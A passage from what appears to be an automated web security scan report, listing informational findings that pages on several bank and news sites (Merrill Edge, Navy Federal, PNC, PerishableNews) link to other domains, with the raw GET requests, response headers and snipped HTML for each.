set-cookie: SMIDENTITY=PgEQy0XKHTw7d8AQZ+WFdKz8dUKNdh6ZtcNvz9MEVSJkjSGRPoelUDlV7pMNbbuKH7u16O7gSueDfCg+p04jStcI0vxUDAlxOqyFWc+hpeJ2C0xuLVn+LvChPleivXZ87kgYNvGtuakw2a+aF1GSLADzmcWqM4WTS5dRgDkzo/u62IoC4z2z2uj7NjRylZ0hPEgV4Q7RYWqXsL2pgqRmJ4TR318Imc1MduN5d4hDE6m9Z2pzl66/TVscy5ktkoVXR/hoWEAptOth2I1tA26NPdvsQOWcnhTSE6NQX5C5ImUWldPNmJx42O2771FVpcgLWubFKto95OdRxdz8sBLdbuThB4PiK/ydUvgh/inK0idd7keNxWkN9S8S0D+VsBDsJ/orYeaN9xmvoVfkXIw9SNXZ682tdIH/2JsxH7Alatu/t0ClHW0PH+IX6lMbV5bqTgvVCvgBd6VLNEvnDQDCBgk62D22wHiwmHtuxCrtS9PFkgNj7FeGC3pF88kcDK0FXAVcRvaz48ygmByhJGYJcvC+FzSIzcVekID5YgUsAjSbL4B+42T6I7RoezGjhqRixumPuKuaPda9CpWgiGFDWfoawftjuqtb18kRCohDVWzbf0SDuNQQrBS1elLy5566; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=9df1961c48af4a01a0b90f634c01931f; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 92002


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<span><a class="bookmark" id="BankOfAmerica" title="BankOfAmerica" href="https://www.bankofamerica.com/BorneoHomepageOptInAction.do" target="_blank" name="BankOfAmerica" alt="Bank of America" pxname="BankOfAmerica"><img width="115" height="14" border="0" alt="Bank of America logo" src="/Publish/Content/image/jpeg/GWMOL/logoBOA1.jpeg" key="Image_BOAlogo_Image8"/>
...[SNIP]...
<span><a class="bookmark" id="UtilLinkLogin" title="UtilLinkLogin" href="http://olui2.fs.ml.com/login/login.aspx?sgt=3" name="UtilLinkLogin" pxname="UtilLinkLogin">Merrill Edge Login</a>
...[SNIP]...
<DIV><a href="https://olui2.fs.ml.com/OAO1/OpenAccountA.aspx" target="_blank" class="btnMajor" name="OpenSDAcct" id="OpenSDAcct" ><span pxname=OpenSDAcct>
...[SNIP]...
<DIV class=paddingBottom_10px><a href="http://www.ml.com/index.asp?id=7695_69068" target="blank" name="PrvcySecrty" id="PrvcySecrty" >Privacy &amp; Security</a>
...[SNIP]...
</A>&#160;|&#160;<a href="http://www.ml.com/index.asp?id=7695_8425_8016_7296#sec_order_execution" target="blank" name="RteExcns" id="RteExcns" >Routing &amp; Executions</a>
...[SNIP]...
</a>&#160;|&#160;<a href="http://www.ml.com/index.asp?id=7695_8425_8016_7296" target="blank" name="LegalInfo" id="LegalInfo" ><span pxname=LegalInfo>
...[SNIP]...
</a>&#160;|&#160;<a href="http://www.ml.com/index.asp?id=7695_17469_14179" target="blank" name="BizCntnty" id="BizCntnty" >Business Continuity</a>
...[SNIP]...
<DIV class="paddingBottom_10px txtBold">MLPF&amp;S is a registered broker-dealer, Member <A href="http://sipc.org/">Securities Investor Protection Corporation (SIPC)</A>
...[SNIP]...
<!-- Begin Core Metrics Tag: Please do not remove-->
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/v40/eluminate.js"></script>
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/cmdatatagutils.js"></script>
...[SNIP]...
<noscript><iframe src="https://fls.doubleclick.net/activityi;src=1359940;type=merri346;cat=0page100;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

16.133. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/merrill-edge-advisory-center.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:19:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=8rSMRsIHOqEijWbCHKAaqJX5+ch79dftsJev5GeFi2aPqQVQXyzgE8UlB/IwyPtyBclsYKcqKPyYA/bV41T6YPOSyQQmvWZkRVsO/836ZqOnKsaQrCHjKaMcQWeidvoR/LSgJLrrM6D7BXTYETzL6Ye78nH1tH8Vm5h0ZCc+lmVpECiiKIl4SAa0+sBw69Jz0AURQErJTmBD3oBcW3KQHqawgMEUz0e8eE4cWbpA/d6773vw54v3O6MKnFJTNdMVyP2QuVv8pkRBdwFTsJr1fZKP7XzSESbGYgUrnuWoC3crGWuW3kity2EeFX5vFYiqRQXcqxP7Mz9zGNtvvCFFsjc3X+Osh8DeUxeCSxP12TyN51R2KfJtD20dRPa4TLrecZ8bAUyyRC6JZQtdZMXzJe7RxRzPyDQ0wrSinasH+hUwrggrI/KZUA9atPs8ZQwq9xqRcyvmOXdJ4r43YiRejZL+szjdzz2aAepEeK3frsz8pyvE+XTaDzmsSVE+qZXz66kKvmPi+9nZX+oYyfV4hw/cNvagAsvhzUxB++jCJ3AEjzTtbqnv9tT/Ix9oBUpEbFjWyly/FQk7/+AO2k+XKLcRWYByUJ791jd/GRuvhewACItXvQNGy9pTMjGjDQ2o; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1
Set-Cookie: pxs=ac6d74447f614d42bf5e14de23d1af76; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 101029


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<span><a class="bookmark" id="BankOfAmerica" title="BankOfAmerica" href="https://www.bankofamerica.com/BorneoHomepageOptInAction.do" target="_blank" name="BankOfAmerica" alt="Bank of America" pxname="BankOfAmerica"><img width="115" height="14" border="0" alt="Bank of America logo" src="/Publish/Content/image/jpeg/GWMOL/logoBOA1.jpeg" key="Image_BOAlogo_Image8"/>
...[SNIP]...
<!-- Begin Core Metrics Tag: Please do not remove--><script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/v40/eluminate.js"></script><script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/cmdatatagutils.js"></script>
...[SNIP]...
<noscript><iframe src="https://fls.doubleclick.net/activityi;src=1359940;type=merri346;cat=inves767;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

16.134. https://www.navyfederal.org/products-services/checking-savings/savings-rates.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /products-services/checking-savings/savings-rates.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products-services/checking-savings/savings-rates.php?selectedTab=4 HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 60414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</span> <a href="https://myaccountsaws.navyfcu.org/mfnfopwd/">help</a>
...[SNIP]...
</h4>
<a href="https://myaccounts.navyfcu.org/cgi-bin/ifsewwwc?Logon&target=002" class="openNow">Open Now</a>
...[SNIP]...

16.135. https://www.navyfederal.org/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /search.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /search.php?q= HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:20:00 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 26681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</span> <a href="https://myaccountsaws.navyfcu.org/mfnfopwd/">help</a>
...[SNIP]...

16.136. https://www.navyfederal.org/vendors/vendorMain.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /vendors/vendorMain.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /vendors/vendorMain.php?var1=AutoBuyingProgram HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:55 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 26839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</span> <a href="https://myaccountsaws.navyfcu.org/mfnfopwd/">help</a>
...[SNIP]...
<p class="pLinks arrow"><a href="https://www.navyfederalautobuying.com" onclick="_gaq.push(['_trackPageview', '/vendors/jump_AutoBuyingProgram']);">Proceed to <strong>
...[SNIP]...

16.137. http://www.navyfederalresearch.org/se.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.navyfederalresearch.org
Path:   /se.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /se.ashx?s=251137457B0354C9 HTTP/1.1
Host: www.navyfederalresearch.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:20:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3k1bfzbnottpr445sebtn245; path=/; HttpOnly
Cache-Control: private, no-store
Expires: Wed, 02 Feb 2011 22:20:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 7370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" dir=
...[SNIP]...
<font size="-2", color="#1A5185">For official communication or to conduct business, use your traditional methods or visit <a href="http://www.navyfederal.org" target="_blank">www.navyfederal.org</a>
...[SNIP]...

16.138. http://www.perishablenews.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perishablenews.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?article=0012418 HTTP/1.1
Host: www.perishablenews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40607

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Tuna Fight Muddies Wat
...[SNIP]...
<!-- Site Meter -->
<script type="text/javascript" src="http://s28.sitemeter.com/js/counter.js?site=s28perishablenews">
</script>
<noscript>
<a href="http://s28.sitemeter.com/stats.asp?site=s28perishablenews" target="_top">
<img src="http://s28.sitemeter.com/meter.asp?site=s28perishablenews" alt="Site Meter" border="0"/></a>
...[SNIP]...
<NOSCRIPT>
<IMG ALT="" BORDER="0" NAME="DCSIMG" WIDTH="1" HEIGHT="1" SRC="http://65.82.4.201/dcs98aj53ahypizmthnmfwion_2x3k/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.2">
</NOSCRIPT>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
<p>
   To read the rest of the story, please go to: <a href="http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html">The Wall Street Journal</a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://del.icio.us/post?v=2&url=www.PerishableNews.com/index.php%3Farticle=0012418&title=Tuna Fight Muddies Waters Over Damage From BP Spill"> del.icio.us </a>
...[SNIP]...
<td width="20" align="center"><img style="border:none" alt="diigo it" src="http://www.diigo.com/images/ii_blue.gif" width="16" height="16" /></td>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://www.diigo.com/post?url=www.PerishableNews.com/index.php%3Farticle=0012418&title=Tuna Fight Muddies Waters Over Damage From BP Spill">Diigo</a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://digg.com/submit?url=www.PerishableNews.com/index.php%3Farticle=0012418&title=Tuna Fight Muddies Waters Over Damage From BP Spill&thumbnails=0"> Digg This </a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://cgi.fark.com/cgi/fark/farkit.pl?u=www.PerishableNews.com/index.php%3Farticle=0012418&h=Tuna Fight Muddies Waters Over Damage From BP Spill"> Fark </a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://www.mister-wong.com/index?action=addurl&amp;bm_url=http://www.PerishableNews.com/index.php%3Farticle=0012418&amp;bm_description=Tuna Fight Muddies Waters Over Damage From BP Spill" title="Add this page to Mister Wong"> Mr. Wong </a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://www.mixx.com/submit?page_url=www.PerishableNews.com/index.php%3Farticle=0012418">Mixx</a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://www.newsvine.com/_wine/save?popoff=1&u=www.PerishableNews.com/index.php%3Farticle=0012418&h=Tuna Fight Muddies Waters Over Damage From BP Spill">Newsvine</a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://www.propeller.com/submit/?U=http://www.PerishableNews.com/index.php%3Farticle=0012418&T=Tuna Fight Muddies Waters Over Damage From BP Spill">Propeller</a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://reddit.com/submit?url=www.PerishableNews.com/index.php%3Farticle=0012418&title=Tuna Fight Muddies Waters Over Damage From BP Spill">Reddit</a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://www.simpy.com/simpy/LinkAdd.do?href=www.PerishableNews.com/index.php%3Farticle=0012418&title=Tuna Fight Muddies Waters Over Damage From BP Spill">Simpy</a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://slashdot.org/slashdot-it.pl?op=basic&url=www.PerishableNews.com/index.php%3Farticle=0012418">Slashdot</a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://www.stumbleupon.com/submit?url=http://www.PerishableNews.com/index.php%3Farticle=0012418&title=Tuna Fight Muddies Waters Over Damage From BP Spill">StumbleUpon</a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://www.technorati.com/claim/6tr33eiwkr">Technorati</a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.PerishableNews.com/index.php%3Farticle=0012418&t=Tuna Fight Muddies Waters Over Damage From BP Spill">MySpace</a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://www.facebook.com/sharer?u=http://www.PerishableNews.com/index.php%3Farticle=0012418&t=Tuna Fight Muddies Waters Over Damage From BP Spill">Facebook</a>
...[SNIP]...
<td height="18"><a class="sharebox02" href="http://twitter.com/home?status=Add This:http://www.PerishableNews.com/index.php%3Farticle=0012418">Twitter</a>
...[SNIP]...
<noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="155" height="155" title="American Pride Seafood"><param name="movie" value="/images/Sponsors/seafood/208.swf">
...[SNIP]...
<noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="999" height="155" title="Natures Catch"><param name="movie" value="/images/Sponsors/seafood/370.swf">
...[SNIP]...

16.139. https://www.pnc.com/webapp/sec/Forms.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/sec/Forms.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/sec/Forms.do?siteArea=/pnccorp/PNC/Contact+Us HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:13 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC9zZWMvRm9ybXMuZG8.
Keep-Alive: timeout=60, max=297
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 53716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
</a> | <a href="https://content.pncmc.com/live/pnc/careers/main/index.html" >Careers</a>
...[SNIP]...
</a><a href="https://www.pncvirtualwallet.com/" >Virtual Wallet</a>
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcsx2yobi00000w45we0xdcvj_6x2g/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</noscript>
...[SNIP]...

16.140. https://www.pnc.com/webapp/sec/ProductsAndService.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/sec/ProductsAndService.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/sec/ProductsAndService.do?siteArea=/pnccorp/PNC/Home/Personal/Online+Banking/PNC+Bank+Online+Banking/Online+Banking+and+Bill+Pay HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:41 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC9zZWMvUHJvZHVjdHNBbmRTZXJ2aWNlLmRv
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001YG5iaUL5qtIsOksP2gRDqG-:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=287
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 33133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
<div class="promoLink colorBold"><a href="https://www.pncsites.com/IRA/choosing.html?WT.mc_id=IRA10_PNCWeb_0001&WT.ac=IRA_0810_P_LN" name="/pnccorp/pnc/global/promotions/personal+promotions/p_adlink_iramicrosite">Get the guidance you need...</a>
...[SNIP]...
<span class="listCopySm"><a href="https://www.pncsites.com/IRA/choosing.html?WT.mc_id=IRA10_PNCWeb_0001&WT.ac=IRA_0810_P_LN" name="/pnccorp/pnc/global/promotions/personal+promotions/p_adlink_iramicrosite">more&nbsp;<img src="/webapp/unsec/Requester?resource=/wps/wcm/connect/0111bb804e5c7fc8a096a7fc6d630ad7/pnc_lst_arr_trans.gif?MOD=AJPERES&amp;CACHEID=0111bb804e5c7fc8a096a7fc6d630ad7" border="0" alt="&g
...[SNIP]...
</a> | <a href="https://content.pncmc.com/live/pnc/careers/main/index.html" >Careers</a>
...[SNIP]...
</a><a href="https://www.pncvirtualwallet.com/" >Virtual Wallet</a>
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcsx2yobi00000w45we0xdcvj_6x2g/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</noscript>
...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/deupnc_PersonalFinanceOnlineBankingBillPay_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

16.141. https://www.pnc.com/webapp/unsec/Blank.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Blank.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/unsec/Blank.do?siteArea=/pnccorp/PNC/PNC+Security+Assurance HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:04 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9CbGFuay5kbw..
Keep-Alive: timeout=60, max=80
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 22992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
</a> | <a href="https://content.pncmc.com/live/pnc/careers/main/index.html" >Careers</a>
...[SNIP]...
</a><a href="https://www.pncvirtualwallet.com/" >Virtual Wallet</a>
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcsx2yobi00000w45we0xdcvj_6x2g/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</noscript>
...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/deupnc_SecurityAssurance_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

16.142. https://www.pnc.com/webapp/unsec/Blank.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Blank.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/unsec/Blank.do?siteArea=/pnccorp/PNC/Home/Personal/Loans/LandingPages/CHELOC+Home+Improvement&WT.mc_id=LOAN10_PNCWeb_0001&WT.ac=CHELOC_0810_P_LN HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:05 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9CbGFuay5kbw..
Keep-Alive: timeout=60, max=295
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 62518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
</p>
               <a href="https://www.loans.clcprocessing.com/PNCWeb/heloc/start.do" class="centered applynow" title="Apply Now &raquo;">Apply Now &raquo;</a>
...[SNIP]...
</a> | <a href="https://content.pncmc.com/live/pnc/careers/main/index.html">Careers</a>
...[SNIP]...
</a><a href="https://www.pncvirtualwallet.com/">Virtual Wallet</a>
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcsx2yobi00000w45we0xdcvj_6x2g/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</noscript>
...[SNIP]...

16.143. https://www.pnc.com/webapp/unsec/Homepage.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Homepage.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/unsec/Homepage.do?siteArea=/pnccorp/PNC/Home/Personal HTTP/1.1
Host: www.pnc.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:36:49 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Ib21lcGFnZS5kbw..
Surrogate-Control: no-store, content="ESI/1.0+"
